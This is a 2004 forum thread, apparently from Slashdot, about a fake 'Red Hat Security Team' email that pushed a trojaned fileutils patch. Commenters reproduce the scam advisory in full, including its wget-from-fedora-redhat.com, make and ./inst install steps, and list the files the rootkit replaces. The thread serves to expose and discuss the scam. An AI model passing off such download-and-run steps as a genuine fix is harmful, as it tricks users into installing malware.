Beware 'Fedora-Redhat' Fake Security Alert

rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.

text of site

Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat

A complete revision history is at the end of this file.

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

* First download the patch from the Stanford RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz or directly here.
* Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
* cd fileutils-1.0.6.patch
* make
* ./inst

Anybody running RedHat and Fedora are strongly adviced to apply this patch! Read more about this vulnerability at www.redhat.com or www.fedora.redhat.com

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

Copyright © 2004 Red Hat, Inc. All rights reserved.

Re:text of site

[Botty]

rofl....remote exploit in ls? Sure.....cause ls binds to port 1337 on execution...oh ya and I setuid ls. The thing about microsoft products is that because they keep everything so hush hush they COULD have remote exploits in the tiniest of products and programs. You never can be sure of what they're doing, but since Linux allows and encourages a complete understanding of how things work, this scare tactic is just laughable. The BSD and Solairs platform notice just means the hacker couldn't make his code portable ;)

Re:text of site

So, #1 it doesn't use RPM? lets see what else could we see wrong with this?

Re:text of site

[Seehund]

Actually, the exploit indeed seems to use RPM. The archive includes a .bin file, which in reality is an RPM.

drwxr-xr-x root/wheel 0 2004-10-23 21:09:09 fileutils-1.0.6.patch/
-rw-r--r-- root/wheel 32 2004-10-23 02:59:42 fileutils-1.0.6.patch/Makefile
-rw-r--r-- root/wheel 14297 2004-10-23 18:02:12 fileutils-1.0.6.patch/inst.c
-rw-r--r-- root/wheel 990084 2004-10-23 21:06:48 fileutils-1.0.6.patch/fileutils-patch.bin

But I see what you mean.

Also, a simple thing such as that this time you're not recommended to simply start up2date or yum to get updates as usual really should set off some alarms in people's minds. And that fedora-redhat.com is not and has never been used by Fedora or Red Hat. And so on.

I doubt that many fell for this.

Re:text of site

66.218.79.155, 66.218.79.147, 66.218.79.148, ...
Connecting to www.fedora-redhat.com[66.218.79.155]:80... connected.

# as of this post it is still up...

Re:text of site

You have to compromise another system (triple score bonus if you compromise one of Pentagon's honeypots) through a compromised OpenBSD box, then they wouldn't have an excuse!

Re:text of site

[justforaday]

Thanks for posting that! Whew, I sure am glad I managed to get that patch installed before anyone was able to take over my system...

Re:text of site

[MBCook]

Anyone who reads this and isn't instantly suspicious needs to up their paranoia level. Look at all the mistakes in the grammar! "Redhat found...". If this was from RedHat it would be "Redhat has found" or "We found" or "It has come to our attention" or something like that. "Some of the effected distriubtions include..." should be something more like "RedHat 7.2 and newer are effected" or some such. It would not end in "and not only" (which is terrible English, probably supposed to be "and more"). Plus why would a RedHat security advisory inform people if Solaris or *BSD was effected? I would expect that a link would be given to more information about the vulnerability (not just "see redhat.com" which is basically what's there). Last but not least, what has been RedHat all thoughout the advisory becomes "Red Hat" in the last line.

Beyond those obvious problems, the "best" targets of something like this (businesses) would have people who know better than this. Those people would know how a patch file would work. At miniumum the "./inst" section should say "make install", which is much more common. So this would only effect the "newbie" Linux user. Last of all, I would expect that anything RedHat issued would say something like "or get the update through Red Carpet (or whatever their 'Windows Update' is called)".

This isn't a very well made forgery. They could have easily taken a true RedHat advisory and modified it so the language would be better and sound more plausable. They could have at LEAST gotten someone who knows English better.

Does anyone else find it strange someone would go through all the trouble of registering a domain-name to run this scam? Why not say "download it off the (such and such) mirror at ftp://120.584.391.568/pub/mirror/redhat/patches/pa tch_file.tar.gz" or something like that. Use any domain name and make it look like a mirror. When was the last time any company put a file for users at "(domainname).com/file.tar.gz"? Never.

Most people could have done better, IMHO.

Re:text of site

Look at all the mistakes in the grammar!

Not only that, but what about the description of the 'vulnerability' itself - they want me to belive that ls and mkdir, which aren't setuid or setgid, are open to root exploits?

Pull the other one.

Jebus, if you're gonna announce an imaginary root exploit, at least make it a hole in something that could actually give root privs.

Re:text of site

Yeah because exploiting FreeBSD servers would actually make a big difference, because as we know *sarcasm* *BSD makes up the core demograph of the Internet. *sarcasm*

Re:text of site

[SnowZero]

By the way, you want to use "affected", not "effected", which is a mistake the site also makes.

Re:text of site

"effected" -> "affected"

Re:text of site

[WindBourne]

It is a little root kit.

/bin/chgrp
/bin/chmod
/bin/chown
/bin/cp
/bin/ dd
/bin/df
/bin/link
/bin/ln
/bin/ls
/bin/mkd ir
/bin/mknod
/bin/mv
/bin/rm
/bin/rmdir
/bin /sync
/bin/touch
/bin/unlink
/etc/DIR_COLORS
/ etc/DIR_COLORS.xterm
/etc/profile.d
/etc/profile .d/colorls.csh
/etc/profile.d/colorls.sh
/usr/bi n/dir
/usr/bin/dircolors
/usr/bin/du
/usr/bin/i nstall
/usr/bin/mkfifo
/usr/bin/shred
/usr/bin/ vdir
...

And there is more, but hey....

Re:text of site

[innocent_white_lamb]

Does anyone else find it strange someone would go through all the trouble of registering a domain-name to run this scam? Why not say "download it off the (such and such) mirror at ftp://120.584.391.568/pub/mirror/redhat/patches/pa tch_file.tar.gz" or something like that.

Actually, they did. I think what's posted here is "version 2". This version came around earlier this weekend:

Original issue date: October 20, 2004

Last revised: October 20, 2004

Source: RedHat

A complete revision history is at the end of this file.

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could
allow a remote attacker to execute arbitrary code with root privileges. Some
of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat
8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that
*BSD and Solaris platforms are NOT affected.

The RedHat Security Team
strongly advises you to immediately apply the fileutils-1.0.6
patch. This is a critical-critical update that you must make by
following these steps:

• First download the patch from the Stanford RedHat mirror:
  wget
  www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar. gz
• Untar the patch: tar zxvf
  fileutils-1.0.6.patch.tar.gz
• cd
  fileutils-1.0.6.patch
• make
• ./inst

Again, please apply this patch as soon as possible or you risk your system
and others` to be compromised.

Thank you for your prompt attention to
this serious matter,

RedHat Security Team.

Copyright © 2004 Red Hat, Inc. All rights reserved.

Re:text of site

[arodland]

Or maybe "affected", unless the vulnerability produces, causes to be, or brings to pass one or more Linux distributions. :)

Re:text of site

I'll give a billion-trillion dollars to anyone who can find a remote code execution security flaw in a non setuid root system utility like ls or mkdir. Honestly, who the hell would fall for this?

Re:text of site

Site Temporarily Disabled

This site has been temporarily disabled. If you are the owner of the site, please contact customer care.

Re:text of site

[ky11x]

Some of the effected distriubtions include..." should be something more like "RedHat 7.2 and newer are effected" or some such.

No. You mean "affected". You are not ready to write your own trojans either :)

Re:text of site

[Brandybuck]

And that fedora-redhat.com is not and has never been used by Fedora or Red Hat. And so on.

Really now? This should set off alarms in people's minds? Do you really expect people to *know* that "fedora-redhat.com" doesn't belong to RedHat? This is social engineering at its finest.

Re:text of site

Most people could have done better, IMHO.
What could you expect for Microsoft ?!

Re:text of site

[Nyder]

wow, our first clue. The anonymous Coward must be the one responsible.

after all, look at all the post AC had done over the years.

Defiently out to get linux users.

Re:text of site

>Brandybuck (704397) wrote: ...
>doesn't belong to RedHat? This is social engineering at its finest.

At it's finest? Who the hell are you kidding. This is a sample of social engineering yes... but... my god it's far from being the cream of the crop. Way way way to many simple mistakes.

Show's lack for attention to detail. Bad grammar, Taiwan mail relay, no up2date source...... screams amature...

Now if the grammar had been correct, if the target had been correct (RH 9, FC 2), if the delivery method had been correct (up2date source), if the mail header had been properly faked... then it would rank as a decent attempt. But really... with the ease at which email headers can be faked.... this doesn't even register on the talent meter of social engineering.

Re:text of site

[Brandybuck]

this doesn't even register on the talent meter of social engineering.

Oh but it does! Stop being an ass and look around you. Not everyone is an expert RedHat administrator. Not everyone is paranoid enough to check the headers of every email their receive. Some people are <gasp> newbies! To them the "redhat-fedora" domain looks damned official.

Re:text of site

[Seehund]

Really now? This should set off alarms in people's minds?

Yes. At least in combination with the other glaring flaws I and others have already mentioned.

People who subscribe to security update announcements (and thus would be the primary target for a fake security announcement) have actively chosen to do so, and know what they look like, where they're sent from, what domains that are usually referenced to and what that/those website(s) look like. People who have not subscribed to such announcements would likely be more suspicious to unsolicited messages of this kind.

There are always exceptions. Some people will be taken in by this, no doubt, despite them being sufficiently savvy to have chosen to install a community-supported Linux distribution in the first place.

It's social engineering all right. Just not at its finest.

Re:text of site

[David+Horn]

You can always tell when something is fake because the spelling and grammar is all wrong. eg, "adviced", the use of exclamation marks, "and not only."

Doesn't take a genius to spot it, but does suggest that it was created by someone who's not a native English speaker. Seems that most bad things on the net (spam and so forth) seem to be heading out from foreign countries.

Re:text of site

Don't be a tit. Anyone who is already subscribed to Fedora-Announce or Fedora-Lgacy would spot this idiotic attempt at an email a mile off and laugh their ass off. Anyone who isn't subscribed should be imediatly suspicous; it is an unsoliciated email telling them to download and run an executable, and contains some dodgy grammar. Anyone stupid enough to fall for this deserves what they get.

Re:text of site

[spiff42]

Well. As far as I know, in a very large percentage of 0wned Linux boxes, the command ls was used as a part of the attack ;-)

/Spiff

Re:text of site

[Analog+Anomaly]

Maybe I'm giving *nix users too much credit, but the bulk of *nix user's have to have atleast some semblance of a clue to use it. It's been my experiance that, like myself, most *nix users arn't complete idiots and wouldn't fall for something so obviously fake. Common sense is a security tool you know.

Re:text of site

[HermanAB]

Well, actually, it is perfect American Public School English - very convincing...

Re:text of site

[Kehvarl]

Perhaps it's simply an incredibly advanced vulnerability which does in fact produce a new linux distribution from nothing but ls and mkdir with the proper path applied.

Re:text of site

Hehehehehehehehehe! Hahahahahahahaahaha!

They can't even make a rpm release of their exploit code?

The next round won't be this stupid.

bcl

Re:text of site

[Kent+Recal]

Man, I would hate to get my DIR_COLORS messed up!

Re:text of site

[zaphraud]

Heres a thought

Maybe its intended for disgruntled workers at said businesses, and therefore, should obviously be a trojan to anyone with a clue, but yet look legitimate enough that a jury would buy it.

Re:text of site

[mgcarley]

How many dumb users out there are running Linux? I would imagine very few. Those that get the email probably know better, anyway. If a patch like that came out, and it really was serious, I would expect RHN to be pushing it at me, not an email from from random website that as a Fedora user I probably wouldn't have otherwise known existed.

For the record, I use SuSE Pro 9.2 anyway - I wouldn't download a patch (especially one that required me to do a make-install like that) from anywhere unless I knew it was an official mirror anyway... Most of the time, YaST keeps me nice and up to date :)

We knew this day would come

[Orgazmus]

Adopting dumb users had to bring the ones exploiting the stpidity with them. Even tho running as a non-admin should help againts these things, there is no cure against security holes between the chair and the keyboard.

Re:We knew this day would come

[Solean]

Linux users are proven to be smarter than the Windows breed of the human race. :)

Re:We knew this day would come

[Stevyn]

I wouldn't worry, they're probably on the forums trying to find the command to install it.

Re:We knew this day would come

[antoy]

Yes, but when this kind of thing happened on Windows, it was Windows' fault for not having the proper security mechanisms to stop it. The difference is that Windows will set up all users as administrators, true, but running as a plain user can be very bad too. The fact is, neither of the OSes provides (by default, at least) substantial protection from such attacks.

Allowing only registered executables to run could be set up to prevent such things. Microsoft signs their patches and programs too, but no regular user will ever check.

Incorporate such functions in the OS or GUI. Harass the user whenever an executable or shared library is introduced to the system: "Here are the certifications, do you trust this?"

Limiting permissions up to the user level is not enough anymore: VM based environments such as Java and .NET have program/assembly-based security systems. But although the technology exists, it is very poorly handled, at least in the .NET front where I am experienced: There is no simple wizard to set up settings the way you want them, there is no popup dialog asking you how much you trust this executable and which permissions it should get. Such technology could go a long way in preventing such ridiculously simple attacks from succeeding in the future.

First time I saw a similar feature was in Kerio Personal Firewall, which would ask everytime a new program would attempt to connect somewhere, or have something connect to a port it opened. It was simple and effective, and the 'harassment' was more than worth it (SP2 does something similar, but it's flawed*).

In conclusion. I want to say that I believe if all people had:

1) Startup Monitor - Painfully simple, no one should be without it.
2) Kerio Personal Firewall, or equivalent
3) An executable monitor as described above.
,the *real* reasons for Windows' pathetic security record would be no more. Never mind those vulnerabilities: I could give you a .exe that would delete all your documents, and you have but to click on it (I swear it decrypts HL2 from the Steam files :-) The same, of course, applies to Linux.


* SP2 tells you when an executable tries to connect, and waits for you to decide if you want to block it, but it *does* allow the connection to work until you decide what to do with it. Furthermore, I'm not sure if it can tell if an executable was replaced with a compromised version (Kerio has MD5 hashes)

Re:We knew this day would come

[Orgazmus]

Then again. How do you get a user that dont understand that securitypatches dont spead via mail, to install those programs?
And allowing only registered executables to run is a bad thing. Who should decide? Microsoft?

Re:We knew this day would come

[antoy]

Then again. How do you get a user that dont understand that securitypatches dont spead via mail, to install those programs?
You can't. That's exactly why they should be part of the OS environment.

And allowing only registered executables to run is a bad thing. Who should decide? Microsoft?

No, the user. I'm not talking about a central authority a la driver-signing. I'm talking about letting that to the user. Does he want to give full network permissions to a shareware game he downloaded? No (with a bold "Recommended" next to it). I hope I made myself clear now.

Re:We knew this day would come

[fucksl4shd0t]

And allowing only registered executables to run is a bad thing. Who should decide?

On my computer, I should decide, and the registration dealie should provide me with the information I need to make the decision.

The two parts of Microsoft's weird DRM thing I disagree with (with regards to running executables) are that the key is inaccessible to me, stashed somewhere in the BIOS, and that Microsoft is the one who decides what is safe and what isn't.

Re:We knew this day would come

[Orgazmus]

"the registration dealie should provide me with the information I need to make the decision."
And then it is possible to fake it, isnt it? :)

Re:We knew this day would come

Memo: Improve step-by-step help for next version. Got it, thanks!

Re:We knew this day would come

[dagur]

This is a giant step for the linux desktop system! It's a proof that linux has become such a mature desktop system that attackers asume it has bunch of regulare John-Doe's!

Re:We knew this day would come

[DissidentHere]

Why would anyoen even bother trying this kind of cheap social engineering with Linux users at this point. What /. reader would actually fall for this shit? We all make fun of security through obscurity, but *nix users also tend to have security through intelligence.

Here is where the real danger lies, getting Linux on the desktop and having your grandma fall for this type of tripe, it will give *nix a bad name. "Oh no, Linux is just as vulnerable as Windows" No - its the users that are vulnerable, and the users that need to be educated. We all do what we can to lock down our boxen, but in the end it too often comes down to what's between the chair and the keyboard.

Re:We knew this day would come

[fucksl4shd0t]

Heh, I didn't say it would be foolproof, just useful.

Re:We knew this day would come

[Hatta]

The fact is, neither of the OSes provides (by default, at least) substantial protection from such attacks.

As long as you have people admining their own boxes at home, you can never protect against these attacks. Any measures you take will restrict my absolute and total control over my own computer, which is what makes linux so attractive in the first place.

Re:We knew this day would come

[antoy]

As long as you have people admining their own boxes at home, you can never protect against these attacks. Any measures you take will restrict my absolute and total control over my own computer, which is what makes linux so attractive in the first place.

I do not see how the measures I propose limit control, considering that all choices are made by the administrator and not by any outside central authority. Care to clarify, or give an example?

Re:We knew this day would come

[suckmysav]

> In conclusion. I want to say that I believe
> if all people had:
>
> 1) Startup Monitor - Painfully simple, no one
> should be without it.

I use startup monitor. It is good. The problem is that the vast majority of Windows users are so habitualised into clicking 'YES' all the time that nasties will often get installed anyway.

Malware: Do you want to install this nasty browser hijacker?

n00b: Yes, just give me my goddamn "tropical aquarium" screensaver already!

> 2) Kerio Personal Firewall, or equivalent

Agreed, although even better is to have a NAT/firewall device for your internet connection. I'm not a fan of having a local "personal" firewall on a n00bs PC, as n00bs have a habit of screwing things up, and this includes screwing up their firewall software. If your firewall functionality is sitting in a little NAT box in the the corner then they are not gonna accidently screw it up. Also, personal firewalls such as ZoneAlarm can also suffer from the "yes click reflex" problem.

Malware: Tries to 'phone home'

ZoneAlarm: Do you want to let application porn2u.exe have access to the internet?

n00b: Yes goddammit, and stop bugging me already!

> 3) An executable monitor as described above.

I'm not sure I understand what you are suggesting here. I assume you are referring to a process listing app, such as the Windows task manager? Most clueless n00bs are not capable of comprehending what task manager is showing them. There are too many "good" processes that are virtually unidentifiable listed.

Re:We knew this day would come

[Hatta]

Allowing only registered executables to run could be set up to prevent such things.

There's a good for instance. Registered executables only work if there's a central registry that's trusted. If each admin keeps his own registry, he's liable to be fooled by people like this.

Re:We knew this day would come

[Hatta]

Memo: Improve step-by-step help for next version. Got it, thanks!

Nah, then they'd know for sure it was a fake.

Re:We knew this day would come

[Erik+Hollensbe]

Actually this is already being done in the unix world, just no one takes advantage of it, or at least, pays attention.

FreeBSD's ports system checks MD5 sums automatically.

RPM can use GPG signing keys. I believe deb can too.

RedHat signs all their RPMs with their security key, Mandrake, SuSE and other RPM pals do it as well. The MD5 sum accompanying FreeBSD's system is distributed by the FreeBSD ports team and generated from the file that is being fetched. It will either try and re-download the file or refuse to work if it it does match, which I'm pretty sure is the case for the GPG counterparts.

It's not limiting the system but it is keeping tabs on what you install.

Of course, if you get "joe's p2p tool 2000 pro platinum gold l33t edition" that one of those groups doesn't distribute, well, you can't blame anyone but yourself for not checking the code itself.

Re:We knew this day would come

[Erik+Hollensbe]

Not to mention, I can't think of a rootkit that doesn't hack ps.

Standard fare for me is to keep a statically compiled ps and lsof available to me off-machine in case anything 'weird' happens. It doesn't solve all problems, but it helps.

Re:We knew this day would come

[Erik+Hollensbe]

You have got to be kidding me.

While I'm not intending to insult anyone's intelligence here, /. is a large group and some pay more attention to security and these kinds of attacks than others. Not to mention, too many people visit here to have "probability = 0" be a realistic assessment.

'Grandma' should never be in the position to install software, IMO. I've been talking to my grandmother about a linux installation for a while, and I will hold 'the keys' and help her out via ssh. As she's pretty set in her ways with her software choices, it should be pretty simple as far as time is concerned.

If you want to advocate linux, don't bother advocating education along with it. Really, if computers were easy to use as cars it would be one thing, but it's not the case currently and I don't see a future that is accepting of it. Not everyone wants to learn how to pay attention to computer security, heck, some people don't even care enough to program their VCR clock (I know, dated analogy, feh).

Re:We knew this day would come

[Hatta]

Actually this is already being done in the unix world, just no one takes advantage of it, or at least, pays attention.

That's the problem isn't it? These systems are in place, but they don't stop this kind of thing from happening. A trusted computing environment like the OP was suggesting would stop this from happening, but would deprive me of the power to use my computer as I see fit.

It's a hard problem. But I'm prepared to live with the consequences of freedom, even if it does result in more compromised systems. (or terrorist attacks, as the case may be)

Re:We knew this day would come

windows sp2 does that, if you download anything, and try to run it, if it isn't digitally signed, it comes up with a box asking if you really want to do it etc, etc.

Re:We knew this day would come

[antoy]

I'm not sure I understand what you are suggesting here. I assume you are referring to a process listing app, such as the Windows task manager?

I'm suggesting executable control: If an you run an executable that wasn't ran before, it will ask you about the way it should handle it (complete trust, no network access, no filesystem access outside of home directory etc.) Also, lots of "Recommended" "Not Recommended" and stop signs for the "n00bs".

Agreed, although even better is to have a NAT/firewall device for your internet connection.

You're right, of course. But the personal firewall can help detect spyware by telling you what program is trying to be naughty.
You're also right about the 'yes' reflex. But some people do read the warnings, and the uninitiated will ask their local 'tech-support' geek for an explanation. If the geek teaches them some good habits without needing to install 3rd-party software, it's a better world for all of us. More tech-savvy people will also like that they can try out that suspicious executable without compromising their machine/user account.

Re:We knew this day would come

[_Sprocket_]

That just means they'll join #linux on their favorite IRC net and DEMAND someone tell them how to install this security patch.

Annoyed by the sense of entitlement, someone will tell them.

Re:We knew this day would come

[suckmysav]

Ah ha, got it

The trouble again would be that most clueless users won't understand what the window asking;

Do you want to allow application
"W1NPR0C32.EXE" to execute?

[YES] [NO]

means, which leads to the same "yes click reflex" problem I described above.

It is a problem, because no matter what you do, there is always going to be a group of numbnuts out there who will click yes on anything that pops up. Often, they won't even read what it says. Any solution that produces even greater numbers of YES/NO dialogues will only serve to make the problem worse I'm afraid.

The solution as I see it is to deny (for a particular class of) users the ability for them to install anything in the first place.

This can be acheived in theory by running Windows under a restricted user policy but in practice it doesn't work because too many programmers are too lazy to write their programs to run with anything other than "administrator" priveleges, so we are stuck with a dilemma that will be hard to overcome.

Re:We knew this day would come

[Erik+Hollensbe]

Actually, I'm not sure if it would.

'Trusted Computing' is nothing new, but automating trust is kind of an oxymoron, don't you think? I mean, even with a strong authentication, someone would just find some other hole in the system to exploit it.

Re:We knew this day would come

[antoy]

means, which leads to the same "yes click reflex" problem I described above

Yes, but in this case, the "yes click reflex" could be a good thing! If the default was a restricted environment for the executable, and if just clicking OK makes most of the programs work (because they are not violating the restrictions as a piece of malware would), then the system works. If it does violate the restrictions, A scary "Program tried to access the network" dialog box would tell you of the program's intents, and allow you to run it under less restrictions if you did want the program to access the network.

The solution as I see it is to deny (for a particular class of) users the ability for them to install anything in the first place.

You can prevent installation of a program by one user for all users (forbid change to global settings) but there is currently nothing that can stop an executable from doing whatever it wants in the user-specific registry tree and files. Even if the problem is reduced to a simple user, it's still a problem, as I said in my first post.
The 'lazy programmers' part is true, but not that much anymore, fortunately. My family computer runs all accounts as normal users, and most software works properly, except for a badly designed Greek encyclopaedia from 1996.

Re:We knew this day would come

[runderwo]

the key is inaccessible to me, stashed somewhere in the BIOS

Actually, it's held inside the TCPA chip. Were it in the BIOS, it could be easily extracted.

Re:We knew this day would come

[maxwell+demon]

The trouble again would be that most clueless users won't understand what the window asking;

Do you want to allow application
"W1NPR0C32.EXE" to execute?

[YES] [NO]

means, which leads to the same "yes click reflex" problem I described above.

This can be solved by a simple redesign of the dialog box:

An unknown application (W1NPR0C32.EXE) wants to open. This might be a security problem. Deny the start of the program?

[YES] [NO]

In this case, the "YES" reflex would actually cause the program not to execute.

Re:We knew this day would come

[tacocat]

Allowing only registered executables to run could be set up to prevent such things. Microsoft signs their patches and programs too, but no regular user will ever check. Incorporate such functions in the OS or GUI. Harass the user whenever an executable or shared library is introduced to the system: "Here are the certifications, do you trust this?"

You're argument is flawed. You assume that at any time the Administrator will be approached with legitimate code and asked to install/upgrade their system. Even if this is not the Administrator doing it you're still making the same error.

The simpler method of keeping the code base secure is to use the installation tools (apt-get for debian or rpm up2date tools) and only those tools for updating anything on the system. That way, if you get a solicitation for updates (legal or not) then you would use the systam update tools to acquire and manage that package update.

spouting off about signature systems that ask about if you trust something or not is going to be pretty useless considering all you have to do is keep up the game trying to convince idiot users that they can trust your package...

Re:We knew this day would come

[kasperd]

Allowing only registered executables to run could be set up to prevent such things.
Mounting /home, /tmp, and /var/tmp with noexec would take you a large step in that direction. I don't know how many other places an unpriveleged user could possibly place an executable, maybe you want all of /var to be noexec.

Microsoft signs their patches and programs too, but no regular user will ever check.
Really? I wanted to do that once, when I had to upgrade the software on my brother's computer. But nobody could tell me how to verify signatures on Microsoft's patches. I even wrote an email to Microsoft, but they couldn't help me either. Of course a lot of people don't give a damn. I know people who keep installing rpm packages without checking the signatures, even though I keep explaining how to check the signatures, which is not much work.

Re:We knew this day would come

[suckmysav]

Good point.

I suppose all the malware producers would need to do is further entwine thier trojan apps with the distribution host (eg the "Aquarium Screensaver").

When the user discovers that their shiny new screensaver refuses to work unless the malware is executed (ie [NO] is clicked) then we would be back to square one.

BUT, I guess anything that makes it more difficult for malware "vendors" can't be a bad thing overall.

I still think a fixed (as in static) user environment is the best way to fully protect the ignorant masses from their own stupidity.

I have been thinking about this lately, and am currently toying with the idea of a limited function "root/administrator" account. Make it so that the root/admin priveleges account of whatever OS you are using has FULL access to install stuff but LIMITED (or somehow partially crippled) ability to do other stuff that normal users might like to do. Maybe have far stricter security policies in place for root accounts causing pop up windows galore whenever potentially dangerous stuff is happening. The idea is to make any account with "administrator" priveleges annoying enough that people will definitely NOT want to conduct their day to day usage with root priveleges.

You could then restrict the ability of general users to install stuff, with a corresponding decrease in the frequency of annoying YES/NO dialogue requirements. If people want to install stuff, they can log in temporarily as root and wade through the higher levels of annonying YES/NO dialogues. They will get what they want done and then log straight out and go back to their less annoying user account.

Anyway, I'm really just thinking out loud here.

Re:We knew this day would come

[antoy]

The simpler method of keeping the code base secure is to use the installation tools (apt-get for debian or rpm up2date tools) and only those tools for updating anything on the system.

Maybe I haven't made myself clear, but I was not talking about updates, I was talking about any random downloaded executable.

If you're used to the Unix/Linux way of thought, it's weird. But Windows doesn't have a central trusted repository of packages.
Think of it in this way (I'm a Debian user): You're looking for a .deb for an obscure piece of software, and you finally find it on some guy's personal repository. You add his site on sources.list and apt-get update/apt-get install someprogram. Is this safe? Of course not. But if you need that program, you acknowledge the (practically tiny) risk and go ahead.

spouting off about signature systems that ask about if you trust something or not is going to be pretty useless considering all you have to do is keep up the game trying to convince idiot users that they can trust your package...

Having to convince the 'idiot' is still better than trusting the package without a single prompt. The measure is weak and flawed, yes. That was not my main argument, however. The .NET-like fine-grained security policy is a much more serious solution (if it is eventually presented properly)

Re:We knew this day would come

[mshiltonj]

The solution as I see it is to deny (for a particular class of) users the ability for them to install anything in the first place.

You must be a sysadmin where I work. I hate you.

Re:We knew this day would come

[FireFury03]

Really, if computers were easy to use as cars it would be one thing, but it's not the case currently and I don't see a future that is accepting of it.

Really? IMHO computers probably are as easy as cars. i.e. if my car needs some maintenance, I don't do it myself (at least, not for anything but the most simple stuff - I wouldn't know where to start), I go to the garage and pay someone who knows what he's doing to fix it. The same applies to computers - if you need some maintenance doing to your computer and you don't know enough to do it yourself then you should be paying a professional to look at it.

Too many people have an attitude of "it should be simple enough for me to maintain" when it comes to computers - I have to ask why? How many people strip down their car engine and then are left with a pile of bits on the floor with no clue how to put them back together and blame the car manufacturer for not making it "easy enough"?

Just because a computer plugs into the wall like a toaster doesn't mean that the user has a "right" to be able to maintain it without any training. I think people need to get out of the idea that computers are things which you buy and then they don't need any upkeep - computers are definately things that you buy and then need maintenance every so often. Some of us are knowledgable to do it ourselves, but the rest should get a professional to sort it out. Maybe manufacturers specifying that a computer requires a yearly service by a professional engineer would be a good idea?

Re:We knew this day would come

[strider44]

The difference is that Windows will set up all users as administrators, true, but running as a plain user can be very bad too.

Perhaps another problem with this, I remember saying before, is that most clueless users will just respond to the following instructions:

1. Login as root.

2. ...

Re:We knew this day would come

[antiMStroll]

I think the number that's going around for average length of time an unpatched Windows box can be connected to the internet before being owned is 16 minutes. Often faster than it can be patched. Conversely, I've run 2K and XP as 'user', including in small corporate environments where machines are populated or performing automated taskes 24 hours a day, for years without incident.

What you say is true but the emphasis leaves a questionable impression. In my experience if operating under 'user' permissions were the norm it would eliminate almost all the trojan, worm, etc. traffic happening today, not by making an exploit impossible but by rasing the effort required to a sufficiently high level.

Re:We knew this day would come

[ajs318]

The only thing you can do about stupid people is hope that sooner or later, they will make a mistake that either (a) teaches them not to be so stupid or (b) eliminates them from the respiration-photosynthesis cycle.

In the old days, when you had power tools with big blades and no safety guards, nobody ever made the same mistake twice. Computers have made things easier and safer for idiots, and idiots have made things harder and more dangerous for the rest of us.

Re:We knew this day would come

[DissidentHere]

Oh give over. No one would ever suggest that every /.er out there is a super genuis. Truth be told though, the /. crowd tends to be pretty intelligent (aside from spelling and grammar). This is especially true when it comes to computers and technology.

There are very few things in life that have a probablity of 0 (or 1 for that matter, other than death and taxes and most of us not getting laid :-) But, the chances of a /. user falling for a social engineering scam of this kind is rather small.

The point I'm trying to make is that social engineering scams are common, and as more secure OSes become popular (i.e. not Windows) the vulnerabilities will focus more on tricking users than technological exploits. So maybe you're pretty set with your grandma, but my former in laws installed stuff all the time, they were fascinated with the Web and these neat little things they use to check the weather, play cards, etc, etc. I was constantly educating them on how to avoid getting malware and cleaning up thier systems. You know that as soon as these types of user start on *nix we'll here about how insecure it is. The error is between the chair and the keyboard.

To say that education should not go along with technology can only make the situation worse. Computers are no more difficult to use than cars, people are just more comfortable with cars, and have more education with them. Sure, most people can't work on a car, but most people know (in theory) how to avoid an accident. That's what a lot of these 'vulnerabilities' are, accidents. Education on basic operation and safety is essential to 'safe computing.'

And yes, no one can set thier VCR clock (mine's not), but this is an interface issue. Its a difficult interface, even more so than a computer due to the limited input interface.

OK, if nothing made sense its becuase I'm home dopped up on Nyquil, so sorry.

Re:We knew this day would come

[Rakarra]

Agreed, although even better is to have a NAT/firewall device for your internet connection. I'm not a fan of having a local "personal" firewall on a n00bs PC, as n00bs have a habit of screwing things up, and this includes screwing up their firewall software. If your firewall functionality is sitting in a little NAT box in the the corner then they are not gonna accidently screw it up. Also, personal firewalls such as ZoneAlarm can also suffer from the "yes click reflex" problem.

"Why can't I play FanFooFighters 2004 online with my friends?"

"Sorry, your firewall is blocking all those incoming packets, and the game isn't compatible with NAT."

I can see that firewall going by the wayside quickly. The game industry as a whole needs to get its act together regarding the ability of games to play behind firewalls and NAT. Some games embed IP addresses inside their network protocol, making it nearly impossible to play them from within a NATed environment.

Re:We knew this day would come

[Erik+Hollensbe]

You must be a user where I work, grow a pair, because that high pitched whine is starting to get annoying.

Re:We knew this day would come

[tcgroat]

"Here are the certifications, do you trust this?" Why, it came from "fedora-redhat.com", so of course you trust it!

Think about it: if you believe the phony web site is legitimate, you're likely to accept the matching bogus credentials, too. The credentials match the site, so what would arouse suspicion in anybody who already (incorrectly) trusts the web site? That is an inherent risk with a credential system: any attacker who can obtain a credential gains an appearance of legitimacy.

Re:We knew this day would come

[Erik+Hollensbe]

I have no idea how you found that the sentence that you based your whole argument off of was in disagreement with it.

If auto makers were constantly pushing the ease of maintenance features on you, instead of the mechanic, I think you'd find that the norm would be quite different.

I mean, take a look at systems with goals like Mandrake. Terms like "Easy Linux", "Accessible Linux".... "Desktop Linux" are dropped so often that people have adopted it as if it's some panacea towards "saving" a OS which already has enough critical mass in the NOC to keep it's forward momentum. It's just stupid and reeks of a need to have something to strive for, regardless if it's pragmatic or not.

Re:We knew this day would come

[Erik+Hollensbe]

Oh give over. No one would ever suggest that every /.er out there is a super genuis. Truth be told though, the /. crowd tends to be pretty intelligent (aside from spelling and grammar). This is especially true when it comes to computers and technology.

